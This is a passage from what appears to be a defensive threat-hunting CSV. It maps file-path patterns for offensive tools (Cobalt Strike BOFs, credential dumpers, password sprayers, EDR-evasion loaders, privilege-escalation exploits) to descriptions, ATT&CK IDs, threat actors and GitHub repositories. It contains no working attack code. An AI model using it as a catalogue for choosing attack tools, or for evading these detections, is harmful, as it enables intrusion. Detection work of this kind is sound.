tools","https://github.com/0xIronGoat/dirty-pipe","1","1","N/A","N/A","1","9","9","2022-03-08T15:47:53Z","2022-03-08T15:30:45Z" +"*/0xthirteen/*","offensive_tool_keyword","SharpStay","SharpStay - .NET Persistence","T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123","TA0003 - TA0008 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/0xthirteen/SharpStay","1","1","N/A","10","5","416","95","2022-09-12T15:39:58Z","2020-01-24T22:22:07Z" +"*/0xthirteen/StayKit*","offensive_tool_keyword","StayKit","StayKit - Cobalt Strike persistence kit - StayKit is an extension for Cobalt Strike persistence by leveraging the execute_assembly function with the SharpStay .NET assembly. The aggressor script handles payload creation by reading the template files for a specific execution type.","T1059 - T1053 - T1124","TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/0xthirteen/StayKit","1","1","N/A","N/A","10","449","81","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z" +"*/1mxml/CVE-2022-23131*","offensive_tool_keyword","POC","POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML)","T1190 - T1550 - T1078","TA0001 - TA0003","N/A","N/A","Exploitation tools","https://github.com/1mxml/CVE-2022-23131","1","1","N/A","N/A","1","3","1","2022-02-19T03:14:47Z","2022-02-18T14:48:53Z" +"*/365-Stealer.git*","offensive_tool_keyword","365-Stealer","365-Stealer is a phishing simualtion tool written in python3. It can be used to execute Illicit Consent Grant Attack","T1111 - T1566.001 - T1078.004","TA0004 - TA0001 - TA0040","N/A","N/A","Phishing","https://github.com/AlteredSecurity/365-Stealer","1","1","N/A","10","3","288","74","2023-06-15T19:56:12Z","2020-09-20T18:22:36Z" +"*/3DESEncryptor.go*","offensive_tool_keyword","Augustus","Augustus is a Golang loader that execute shellcode utilizing the process hollowing technique with anti-sandbox and anti-analysis measures. The shellcode is encrypted with the Triple DES (3DES) encryption algorithm.","T1055.012 - T1027.002 - T1136.001 - T1562.001","TA0005 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/TunnelGRE/Augustus","1","1","N/A","6","2","107","23","2023-08-27T10:37:51Z","2023-08-21T15:08:40Z" +"*/3snake.git*","offensive_tool_keyword","3snake","Tool for extracting information from newly spawned processes","T1003 - T1110 - T1552 - T1505","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/blendin/3snake","1","1","N/A","7","7","688","114","2022-02-14T17:42:10Z","2018-02-07T21:03:15Z" +"*/4luc4rdr5290/CVE-2022-0847*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1204 - T1055 - T1003 - T1015 - T1068 - T1059 - T1047","TA0001 - TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/4luc4rdr5290/CVE-2022-0847","1","1","N/A","N/A","1","1","2","2022-03-08T20:41:15Z","2022-03-08T20:18:28Z" +"*/78dc91f1A716DBBAA9E4E12C884C1CB1C27FFF2BEEED7DF1*","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","10","10","1362","429","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" +"*/78dc91f1A716DBBAA9E4E12C884C1CB1C27FFF2BEEED7DF1*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","224","42","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z" +"*/AbandonedCOMKeys/*","offensive_tool_keyword","AbandonedCOMKeys","Enumerates abandoned COM keys (specifically InprocServer32). Useful for persistence","T1547.011 - T1049 - T1087.002","TA0005 - TA0007 - TA0003","N/A","N/A","Persistence","https://github.com/matterpreter/OffensiveCSharp/tree/master/AbandonedCOMKeys","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"*/acarsd-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/AceLdr.cna*","offensive_tool_keyword","cobaltstrike","Cobalt Strike UDRL for memory scanner evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/kyleavery/AceLdr","1","1","N/A","10","10","714","123","2023-09-28T19:47:03Z","2022-08-11T00:06:09Z" +"*/acheron.git*","offensive_tool_keyword","acheron","indirect syscalls for AV/EDR evasion in Go assembly","T1055.012 - T1059.001 - T1059.003","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/f1zm0/acheron","1","1","N/A","N/A","3","244","31","2023-06-13T19:20:33Z","2023-04-07T10:40:33Z" +"*/acheron.go*","offensive_tool_keyword","acheron","indirect syscalls for AV/EDR evasion in Go assembly","T1055.012 - T1059.001 - T1059.003","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/f1zm0/acheron","1","1","N/A","N/A","3","244","31","2023-06-13T19:20:33Z","2023-04-07T10:40:33Z" +"*/ACLight.git*","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","AD Enumeration","https://github.com/cyberark/ACLight","1","1","N/A","7","8","730","150","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z" +"*/ACLight/*","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","Information Gathering","https://github.com/cyberark/ACLight","1","1","N/A","N/A","8","730","150","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z" +"*/acltoolkit*","offensive_tool_keyword","acltoolkit","acltoolkit is an ACL abuse swiss-army knife. It implements multiple ACL abuses","T1222.001 - T1222.002 - T1046","TA0007 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/zblurx/acltoolkit","1","1","N/A","N/A","2","108","14","2023-02-03T10:27:45Z","2022-01-12T22:45:49Z" +"*/acm_enum_cas_*.json*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*/acm_enum_certs_*.json*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*/acm_enum_certs_chain_*.json*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*/acm_enum_certs_expired_*.json*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*/acm_enum_certs_info_*.json*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*/ActiveScanPlusPlus*","offensive_tool_keyword","ActiveScanPlusPlus","ActiveScan++ extends Burp Suite's active and passive scanning capabilities. Designed to add minimal network overhead. it identifies application behaviour that may be of interest to advanced testers","T1583 - T1595 - T1190","TA0001 - TA0002 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/albinowax/ActiveScanPlusPlus","1","1","N/A","N/A","6","568","191","2022-11-15T13:47:31Z","2014-06-23T10:04:13Z" +"*/AD_Enumeration_Hunt*","offensive_tool_keyword","AD_Enumeration_Hunt","This repository contains a collection of PowerShell scripts and commands that can be used for Active Directory (AD) penetration testing and security assessment","T1018 - T1003 - T1033 - T1087 - T1069 - T1046 - T1069.002 - T1047 - T1083","TA0001 - TA0007 - TA0005 - TA0002 - TA0003","N/A","N/A","AD Enumeration","https://github.com/alperenugurlu/AD_Enumeration_Hunt","1","1","N/A","7","1","79","16","2023-08-05T06:10:26Z","2023-08-05T05:16:57Z" +"*/ADACLScanner.git*","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - TA0007 - TA0043","N/A","N/A","AD Enumeration","https://github.com/canix1/ADACLScanner","1","1","N/A","7","9","809","151","2023-09-12T21:35:21Z","2017-04-06T12:28:37Z" +"*/adalanche/modules/*","offensive_tool_keyword","adalanche","Active Directory ACL Visualizer and Explorer - who's really Domain Admin?","T1484 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/lkarlslund/Adalanche","1","1","N/A","N/A","10","1202","119","2023-06-20T13:02:30Z","2020-10-07T10:07:22Z" +"*/adconnectdump.git*","offensive_tool_keyword","adconnectdump","Dump Azure AD Connect credentials for Azure AD and Active Directory","T1003.004 - T1059.001 - T1082","TA0006 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/fox-it/adconnectdump","1","1","N/A","10","6","507","84","2023-08-21T00:00:08Z","2019-04-09T07:41:42Z" +"*/adcs.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/adcs_enum/*","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","10","10","966","173","2023-09-22T15:51:55Z","2020-07-15T16:21:18Z" +"*/adcs_request/adcs_request.*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/adcs_request/CertCli.*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/adcs_request/certenroll.*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/adcs_request/CertPol.*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/adcs-enum.py*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*/ADCSKiller*","offensive_tool_keyword","ADCSKiller","ADCSKiller is a Python-based tool designed to automate the process of discovering and exploiting Active Directory Certificate Services (ADCS) vulnerabilities. It leverages features of Certipy and Coercer to simplify the process of attacking ADCS infrastructure","T1552.004 - T1003.003 - T1114.002","TA0006 - TA0003 - TA0005","N/A","N/A","Exploitation tools","https://github.com/grimlockx/ADCSKiller","1","1","N/A","N/A","6","536","53","2023-05-19T17:36:37Z","2023-05-19T06:51:41Z" +"*/ADCSPwn.git*","offensive_tool_keyword","ADCSPwn","A tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service","T1550.002 - T1078.003 - T1110.003","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bats3c/ADCSPwn","1","1","N/A","10","8","749","119","2023-03-20T20:30:40Z","2021-07-30T15:04:41Z" +"*/add_computer.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/add_groupmember.py*","offensive_tool_keyword","acltoolkit","acltoolkit is an ACL abuse swiss-army knife. It implements multiple ACL abuses","T1222.001 - T1222.002 - T1046","TA0007 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/zblurx/acltoolkit","1","1","N/A","N/A","2","108","14","2023-02-03T10:27:45Z","2022-01-12T22:45:49Z" +"*/address-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/AddUser-Bof.*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF that Add an admin user","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/0x3rhy/AddUser-Bof","1","1","N/A","10","10","52","12","2022-10-11T06:51:27Z","2021-08-30T10:09:20Z" +"*/AddUser-Bof/*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF that Add an admin user","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/0x3rhy/AddUser-Bof","1","1","N/A","10","10","52","12","2022-10-11T06:51:27Z","2021-08-30T10:09:20Z" +"*/ADFSpoof.py*","offensive_tool_keyword","ADFSpoof","A python tool to forge AD FS security tokens.","T1600 - T1600.001 - T1552 - T1552.004","TA0006 - TA0001","N/A","N/A","Sniffing & Spoofing","https://github.com/mandiant/ADFSpoof","1","1","N/A","10","4","300","52","2023-09-21T17:14:52Z","2019-03-20T22:30:58Z" +"*/ADFSpray*","offensive_tool_keyword","adfspray","Python3 tool to perform password spraying against Microsoft Online service using various methods","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/xFreed0m/ADFSpray","1","1","N/A","N/A","1","76","14","2023-03-12T00:21:34Z","2020-04-23T08:56:51Z" +"*/ADHunt.git*","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Enviroments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","AD Enumeration","https://github.com/karendm/ADHunt","1","1","N/A","7","1","41","8","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z" +"*/ad-ldap-enum.git*","offensive_tool_keyword","ad-ldap-enum","An LDAP based Active Directory user and group enumeration tool","T1087 - T1087.001 - T1018 - T1069 - T1069.002","TA0007 - TA0003 - TA0004","N/A","N/A","AD Enumeration","https://github.com/CroweCybersecurity/ad-ldap-enum","1","1","N/A","6","3","290","72","2023-02-10T19:07:34Z","2015-08-25T19:38:39Z" +"*/adm2sys.py*","offensive_tool_keyword","PyExec","This is a very simple privilege escalation technique from admin to System. This is the same technique PSExec uses.","T1134 - T1055 - T1548.002","TA0004 - TA0005 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/OlivierLaflamme/PyExec","1","1","N/A","9","1","10","6","2019-09-11T13:56:04Z","2019-09-11T13:54:15Z" +"*/Admin2Sys.git*","offensive_tool_keyword","Admin2Sys","Admin2Sys it's a C++ malware to escalate privileges from Administrator account to NT AUTORITY SYSTEM","T1055.002 - T1078.003 - T1068","TA0002 - TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/S12cybersecurity/Admin2Sys","1","1","N/A","10","1","31","15","2023-05-01T19:32:41Z","2023-05-01T18:50:51Z" +"*/admin-panels.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*/ADRecon*","offensive_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner and Earth Lusca Operations Tools and commands","T1087 - T1012 - T1064 - T1210 - T1213 - T1566 - T1071","TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Information Gathering","https://github.com/sense-of-security/ADRecon","1","1","N/A","N/A","10","1515","271","2020-06-15T05:23:14Z","2017-11-29T23:01:53Z" +"*/ADSearch.git*","offensive_tool_keyword","adsearch","A tool to help query AD via the LDAP protocol","T1087 - T1069.002 - T1018","TA0003 - TA0002 - TA0007","N/A","N/A","Reconnaissance","https://github.com/tomcarver16/ADSearch","1","1","N/A","N/A","4","371","44","2023-07-07T14:39:50Z","2020-06-17T22:21:41Z" +"*/aerosol.py*","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061","TA0001 - TA0002 - TA0003","N/A","N/A","Credential 